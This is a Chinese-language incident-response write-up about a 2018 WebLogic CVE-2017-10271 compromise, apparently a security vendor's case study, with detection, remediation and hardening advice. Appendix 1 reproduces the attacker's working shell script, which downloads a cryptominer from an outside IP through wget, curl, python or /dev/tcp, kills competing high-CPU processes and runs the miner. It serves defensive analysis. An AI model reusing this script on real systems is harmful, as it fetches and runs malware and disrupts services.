WebLogic 中间件高危漏洞应急响应案例分享
一、事件概述
2018年1月2日8点30分,某省级单位联网直报系统页面突发无法访问。经排查,服务器出现异常命令执行记录:攻击者利用系统漏洞结束了关键进程,并尝试从境外服务器下载病毒程序。经过紧急应急处置,事件得到有效控制,系统恢复正常。分析结果显示,事件源于WebLogic中间件存在高危远程代码执行漏洞。
二、事件检测与分析过程
应急服务团队迅速介入,按照标准流程开展检测与分析:
1. 异常行为确认
- 检查系统日志,发现恶意 history 命令执行记录。
- 攻击脚本主要功能:
- 下载器功能:尝试通过 wget、curl、python 等工具,从境外IP 165.227.215.25 下载 xmrig-y 文件。
- 进程清除功能:通过 killer() 函数,结束高CPU进程。
- 运行器功能:下载病毒程序后,赋予权限并运行。
- 病毒样本 xmrig-y 被分析为加密货币挖矿程序(门罗币Monero),会创建伪装文件(如 /tmp/EB93A6/996E.elf),消耗服务器资源进行非法挖矿。
2. 攻击路径溯源
- 登录审计:last 登录记录无异常,排除弱口令爆破等手段。
- 漏洞定位:服务器使用 Oracle WebLogic Server 10.3.6.0,存在已知高危远程代码执行漏洞(CVE-2017-10271),攻击者可通过 wls-wsat 组件远程执行任意命令。
- 防护设备日志分析:WAF日志初查无异常,手动更新特征库后发现针对 wls-wsat 的攻击行为。防火墙特征库未及时生效,攻击未被拦截。
三、事件定性
本次事件为 利用WebLogic中间件已知高危漏洞发起的远程代码执行攻击。攻击者通过漏洞控制服务器,主要目的是:
- 下载并运行挖矿程序,非法牟利
- 清除竞争资源的进程,导致业务系统服务中断
四、应急处置与修复措施
应急处置团队采取了以下措施:
1. 抑制与根除
- 服务器网络策略禁止主动外连,病毒程序未能成功下载,有效避免财产损失。
- 彻底根除隐患,强烈建议立即安装WebLogic安全补丁。
- 如无法立刻打补丁,可临时删除易受攻击组件:
rm -rf /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat删除后重启WebLogic,并访问 http://[域名或IP]/wls-wsat/CoordinatorPortType 验证返回404。
2. 系统恢复与加固
- 全面病毒查杀,确认无残留恶意程序。
- 修复漏洞后重启服务,系统恢复正常。
- 安全加固:在 /etc/profile 添加 export HISTTIMEFORMAT='%F %T ',让 history 记录详细时间,便于审计溯源。
五、事件总结与改进建议
本次事件暴露出软件资产和漏洞管理短板:对中间件等基础软件的漏洞情报关注不足,补丁更新流程不及时。WAF等防护设备特征库更新滞后,难以防御最新漏洞利用。
改进建议
- 建立严格的漏洞补丁管理机制
定期关注官方安全公告,建立软件台账,制定补丁测试与更新计划。 - 实施纵深防御策略
结合网络层防火墙、主机安全(EDR)、应用层WAF等,构建多层防护体系。 - 加强安全监控与日志审计
确保安全设备日志功能正常并集中管理,及时发现异常行为,完善系统操作审计。 - 最小权限原则
应用和服务器运行最小权限,避免高权限账户,限制漏洞利用影响范围。
附录1:被执行的攻击命令示例
downloader () { if checkCmd wget; then wget $1 -O $2 ; elif checkCmd curl; then curl $1 -o $2; elif checkCmd python; then if [ "`python -c "import sys; print(sys.version_info[0])"`" = "3" ]; then python -c "from urllib.request import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; else python -c "from urllib import urlopen; u = urlopen('"$1"'); localFile = open('"$2"', 'wb'); localFile.write(u.read()); localFile.close()"; fi; else cat < /dev/tcp/165.227.215.25/5555 > $2; fi; chmod +x $2; } killer() { for tmpVar in `ps -aeo pid,%cpu,command | sed 1d | sort -k 2 | tail -n 10 | awk '{print $1}'`; do if [ $tmpVar = $sPid ]; then continue; fi; if [ $tmpVar = $mPid ]; then continue; fi; if [ `ps -o %cpu $tmpVar | sed 1d | sed 's/\..*//g'` -ge 60 ]; then if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep java` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep sh` ]; then continue; fi; if [ `ps $tmpVar | sed 1d | awk '{print $5}' | grep bash` ]; then continue; fi; kill -9 $tmpVar; rm -f `ls -l /proc/$tmpVar/exe 2>&1 | sed 's/.*-> //g'`; fi; done; } runer() { if [ -z "$mPid" ]; then if [ ! -f $mName ]; then downloader http://165.227.215.25/xmrig-y $mName; fi; chmod +x ./$mName; ./$mName; fi; mPid=`ps -eo pid,command | grep $mName | head -n 1 | awk '{print $1}'`; } 附录2:wls-wsat 组件漏洞说明
- wls-wsat 组件存在XMLDecoder反序列化远程代码执行漏洞,典型为 CVE-2017-10271。
- 攻击者可通过发送恶意XML包,在未授权情况下远程执行任意系统命令,完全控制目标服务器。
核心漏洞详情
漏洞原理
wls-wsat 是 Oracle WebLogic Server 的 WLS Security 组件,用于WebService服务。该组件在处理SOAP请求时,使用XMLDecoder类解析XML数据,未校验输入安全,攻击者可构造恶意XML触发反序列化,执行任意Java代码或系统命令。
影响版本
- Oracle WebLogic Server 10.3.6.0.0
- Oracle WebLogic Server 12.1.3.0.0
- Oracle WebLogic Server 12.2.1.1.0
- Oracle WebLogic Server 12.2.1.2.0
漏洞利用方式
攻击者通常通过POST请求访问 /wls-wsat/CoordinatorPortType,发送恶意XML payload,即可远程代码执行。利用难度低,相关PoC已公开。
